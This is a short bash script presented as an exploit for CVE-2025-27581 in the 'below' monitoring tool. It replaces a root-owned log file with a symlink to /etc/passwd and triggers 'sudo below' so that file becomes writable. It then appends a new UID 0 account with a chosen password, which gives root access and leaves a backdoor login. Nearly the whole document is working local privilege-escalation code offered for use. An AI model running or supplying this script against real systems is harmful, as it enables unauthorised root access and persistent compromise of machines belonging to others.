#!/bin/bash

#Make sure args are  passed
if [ "$#" -ne 2 ]; then
        echo "CVE-2025-27581 exploiter. Creates a fake root account in /etc/passwd";
        echo "Usage: $0 <username> <password>";
        exit 1;
        echo "WARNING: Your password could be seen in the logs / processes as it's input as cmdline arguments";
fi


echo "WARNING: Your password could be seen in the logs / processes as it's input as cmdline arguments";

# Remove any reference to the old log

root_log_path=/var/log/below/error_root.log;

rm $root_log_path;

# Create the symlink
ln -s /etc/passwd $root_log_path;

sudo below debug dump-store --time 1;

echo "New permissions set on /etc/passwd";

ls -la /etc/passwd;


# Get args
username=$1;
password=$2;


# Create a SHA-512 hash of input password with random salt
hashed=$(/usr/bin/openssl passwd -6 $password);
epoch_time=$(date +%s);
passwd_hash_entry="$username:$hashed:0:0:root:/root:/bin/bash";

echo "Overwriting /etc/passwd with the new account now"
echo $passwd_hash_entry >> /etc/passwd;

echo "Hopefully that worked";
echo "Try logging in as $username:$password";

echo "WARNING 2: Your password hash has been stored in /etc/passwd so can be seen by ANYONE on the system";
echo "I reccommend you update it via passwd and make sure it's gone from /etc/shadow";

# Cleanup
rm $root_log_path;